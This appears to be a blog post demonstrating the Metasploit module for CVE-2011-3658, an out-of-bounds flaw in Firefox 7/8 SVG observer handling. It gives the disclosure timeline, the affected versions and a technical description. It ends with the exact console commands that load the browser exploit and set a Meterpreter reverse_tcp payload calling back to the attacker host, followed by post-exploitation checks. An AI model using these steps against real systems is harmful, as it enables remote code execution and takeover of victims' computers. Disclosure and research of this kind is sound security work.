CVE-2011-3658 Firefox 7/8 nsSVGValue Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by regenrecht
Vulnerability reported by regenrecht to ZDI
Vulnerability reported to the vendor by ZDI the 2011-12-01
Coordinated public release of the vulnerability the 2011-12-20
Metasploit PoC provided the 2012-05-07

PoC provided by :

regenrecht
Lincoln
corelanc0d3r

Reference(s) :

CVE-2011-3658
OSVDB-77953
MFSA-2011-55

Affected version(s) :

Mozilla Firefox before version 9.0
Mozilla Firefox before version 3.6.28
Mozilla Thunderbird before version 9.0
Mozilla SeaMonkey before version 2.6

Tested on Windows XP Pro SP3 with :

Mozilla Firefox before version 7.0.1

Description :

This metasploit module is quiet unstable and exploitation is random.

This module exploits an out-of-bounds access flaw in Firefox 7 and 8. The notification of nsSVGValue observers via nsSVGValue::NotifyObservers(x,y) uses a loop which can result in an out-of-bounds access to attacker-controlled memory. The mObserver ElementAt() function (which picks up pointers), does not validate if a given index is out of bound. If a custom observer of nsSVGValue is created, which removes elements from the original observer, and memory layout is manipulated properly, the ElementAt() function might pick up an attacker provided pointer, which can be leveraged to gain remote arbitrary code execution.

Commands :

use exploit/windows/browser/mozilla_nssvgvalue
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo

1 thought on “CVE-2011-3658 Firefox 7/8 nsSVGValue Vulnerability Metasploit Demo

Comments are closed.